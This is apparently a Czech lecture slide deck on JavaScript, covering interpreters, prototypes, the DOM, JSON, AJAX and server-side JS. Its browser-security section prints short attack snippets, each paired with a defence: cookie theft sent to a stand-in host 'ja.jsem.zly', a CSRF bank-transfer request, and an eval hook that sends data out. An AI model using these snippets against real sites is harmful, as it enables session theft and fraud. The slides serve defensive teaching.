Implementace Javascriptu

• Mnoho nezávislých interpretů

  Interpret(y)	Prohlížeč(e)
  Spidermonkey, Tracemonkey, Jägermonkey	Mozilla, Firefox, Camino
  JScript, Chakra	Internet Explorer
  V8	Google Chrome
  JavaScriptCore, SquirrelFish (Nitro)	Safari
  Futhark, Carakan	Opera
  KJS	Konqueror

Výkon

• Evergreen posledních let
• Klíčová místa pro výkon interpretu
  • Garbage collector
  • Bytecode – rychlost (podmíněné) kompilace
  • Generování nativního kódu
• Server-side JS: možné cachování bajtkódu
• Uživatelský zážitek je zpravidla omezován jinde
  • DOM
  • HTTP
  • Rendering

Javascript a OOP

• Chybí koncept tříd, instancí a dědičnosti tak, jak ho známe
• Nutný základ: syntaxe a datové typy
• První krok: this
• Základní stavební prvky: objekt a funkce
• Druhý krok: new, __proto__, prototype

Nutný základ: syntaxe a datové typy

• Literálový zápis objektů a polí

  var pole = [1, 2, 3]; var objekt = {nazev1:3.14, "nazev2":pole}; objekt["nazev2"][2] == 3;

• Funkce jako first-class object

  function funkce1() {}; var funkce2 = function() {}; funkce1.nejakaVlastnost = 3; funkce2["nejakaVlastnost"] = funkce1;

• Předávání složitějších struktur referencí

  var banka = ["100 $", "200 £", "300 €"]; var bahamy = banka; bahamy.pop(); /* odebrání posledního prvku z pole */ banka.length == 2; /* :-( */

První krok: klíčové slovo this

• Odkaz na objekt, jehož funkce je nyní vykonávaná
• Pokud takový neexistuje, this odkazuje na globální objekt (window)
• function jmeno() { alert(this.name); } window.name = "n/a"; var jarda = {name:"Jaroslav", jmeno:jmeno}; var pepa = {name:"Josef", jmeno:jmeno}; jmeno(); /* "n/a" */ jarda.jmeno(); /* "Jaroslav" */ pepa.jmeno(); /* "Josef" */

První krok: ohýbání this

• Funkce lze volat explicitně v zadaném kontextu
• function jmeno() { alert(this.name); } window.name = "n/a"; var jarda = {name:"Jaroslav"}; jmeno.apply(jarda); /* "Jaroslav" */
• Takto volané funkci lze předat i parametry
• jmeno.apply(jarda, [param1, param2, ...]); jmeno.call(jarda, param1, param2, ...);

Základní stavební prvky: objekt a funkce

• V tradičních OOP jazycích jsou třídy a instance
• Javascript má "jen" funkce a objekty
• funkce != třída, instance != objekt
• Každý objekt má implicitně vlastnost __proto__
  (ne všechny interprety ji dávají veřejně k dispozici)
• Každá funkce má implicitně vlastnost prototype
• Bonus: funkce je také objekt

Použití __proto__: přistupování k vlastnostem

var mujObjekt = { a:3 }; alert(mujObjekt.b);

Jak postupuje interpret při dotazu na vlastnost?

1. Existuje vlastnost b v objektu?
2. Pokud ne, existuje vlastnost __proto__.b ?
3. Pokud ne, existuje vlastnost __proto__.__proto__.b ?
4. ...

• Prototype chain

Druhý krok: Operátor new

• Javascript nabízí operátor new s touto syntaxí: var funkce = function(parametry) { ... }; var vysledek = new funkce(parametry);
• Operátor new je téměř shodný s touto funkcí:

  function New(nejakaFunkce, parametry) { var out = {}; out.__proto__ = nejakaFunkce.prototype; nejakaFunkce.apply(out, parametry); return out; } var vysledek = New(funkce, parametry);

Využití při tvorbě tříd

Nepodporujeme atribut prototype, který je u všech objektů. Tento atribut je normou povolen a přidává do objektu nové metody a atributy (případně s danou hodnotou). Tento atribut jsme neimplementovali, protože by byl problém ho implementovat a jsme toho názoru, že je k ničemu. — prohlížeč Links, projektová dokumentace

• Třída vs. instance (diagram): var Delnik = function() { this.penize = 0; } Delnik.prototype.pracuj = function() { this.penize++; } var ondra = new Delnik(); ondra.pracuj(); /* ondra.__proto__.pracuj == Delnik.prototype.pracuj */

Využití při dědičnosti

• Dědičnost (diagram): var Predak = function() { this.penize = 10; } Predak.prototype = new Delnik(); var jarda = new Predak(); jarda.pracuj(); /* jarda.__proto__ == Predak.prototype jarda.__proto__.pracuj == Predak.prototype.pracuj Predak.prototype.pracuj == Predak.prototype.__proto__.pracuj == Delnik.prototype.pracuj */

Důsledky prototypové dědičnosti – zjištění třídy

• Operátor instanceof testuje shodu vlastností __proto__ a prototype (diagram)

  var Poslanec = function() {}; var jarda = new Poslanec(); jarda instanceof Poslanec; /* true */ var Senator = function() {}; Senator.prototype = Poslanec.prototype; jarda instanceof Senator; /* true! */

Důsledky prototypové dědičnosti – obohacování

var pole = [3]; /* var pole = new Array(); */ pole.vypisSe(); /* chyba: neexistuje */ Array.prototype.vypisSe = function() { alert(this.join(", ")); } pole.vypisSe();

Co je to DOM

• DOM = Document Object Model
• Objektové API pro manipulaci s XML stromem
• Rozšíření specifické pro HTML

  var odstavec = document.getElementsByClassName("mujOdstavec")[0]; while (odstavec.firstChild) { odstavec.removeChild(odstavec.firstChild); } odstavec.innerHTML = "Odpor <strong>je</strong> marný."; odstavec.addEventListener("click", alert, false);

• Nesouvisí s JS interpretem
• Souvisí s prohlížečem, resp. jeho jádrem (Gecko, KHTML, Webkit, Presto, Trident, ...)

DOM a jeho problémy

• The DOM is a Mess
• QuirksMode vs. Standards Mode
• document.getElementById("nejakeId") - nefunguje bez DTD ID
• var odstavce = document.getElementsByTagName("p"); for (var i=0;i<odstavce.length;i++) { var odstavec = odstavce[i]; odstavec.parentNode.removeChild(odstavec); }
• var funkce = function() { ... } var odkaz = document.getElementById("mujOdkaz"); odkaz.attachEvent("onclick", funkce); odkaz.addEventListener("click", funkce, false); odkaz.onclick = funkce;

Co je to JSON

• JSON = JavaScript Object Notation
• Triviální textová serializace stromové datové struktury
• Dle RFC 4627 jen čísla, řetězce, true/false, objekty, pole a null
• Možno rozšířit např. o regulární výrazy a datumy
• Masivní rozšíření z důvodu triviální deserializace
• var json = '{ "jmeno": "Jindra", "deti": [5, 8, 12] }'; var data = eval("("+json+")");

JSON vs. XML

• Menší datová náročnost
• Nutnost vykonávání JS kódu při deserializaci
• Snazší použití
• Riziko zneužití

Co je to AJAX

• AJAX = Asynchronous Javascript And Xml
• var request = new XMLHttpRequest(); request.open("get", "/nejaky/soubor.txt", true); /* třetí parametr určuje (a)synchronnost */ request.send("");
• Prohlížeč disponuje DOM parserem
• Řada obtíží:
  • Synchronní požadavek blokuje prohlížeč
  • Asynchronní požadavek se složitěji zpracovává
  • Nepodporuje všechny vlastnosti protokolu HTTP
  • Same origin policy restriction

Bezpečnost JS v prohlížeči

• Útok = důsledek vykonávání cizích skriptů
• Cíl #1 – zabránit v získání citlivých dat
• Cíl #2 – zabránit v zneužití citlivých dat
• Obecná prevence – JS Sandbox

Jednoduchá krádež sušenek

var susenka = document.cookie; var url = "http://ja.jsem.zly/?susenka=" + encodeURIComponent(susenka); var img = document.createElement("img"); img.src = url;

Ochrana: HttpOnly cookies

Zneužití sušenek bez jejich znalosti (CSRF)

var url = "http://nejaka.banka.cz/?prevod&castka=1000&from=jarda&to=lojza"; var img = document.createElement("img"); img.src = url;

Ochrana: kombinace GET tokenu a cookie se stejnou hodnotou

Liknavá interpretace JSON dat

var oldEval = eval; eval = function(jsCode) { var url = "http://ja.jsem.zly/?data=" + encodeURIComponent(jsCode); var img = document.createElement("img"); img.src = url; return oldEval(jsCode); }

Ochrana: nepoužívat eval()

Javascript mimo prohlížeč

• Evergreen posledních let
• Zpravidla jeden interpret + podpůrné knihovny (filesystem, DB, ...)
• Cílená podpora CGI/FastCGI/Apache
• Nedávná aktivita Mozilly pro standardizaci CommonJS

Některé známé implementace

• Jaxer (SpiderMonkey) – modul do Apache, filozofie podobná ASP.NET
• GLUEscript (SpiderMonkey) – commandline aplikace, modul do Apache, expat, wxWidgets, SQLite/MySQL
• Helma NG (Rhino) – HTTP, XML, JDBC
• Phobos (Rhino) – Servlet pro Jetty
• node.js (V8) – Striktně asynchronní implementace I/O operací
• v8cgi (V8) – CGI/FastCGI aplikace, sockety, MySQL, PostgreSQL, GD, Apache modul, …
• A další – výčet na http://www.commonjs.org/impl/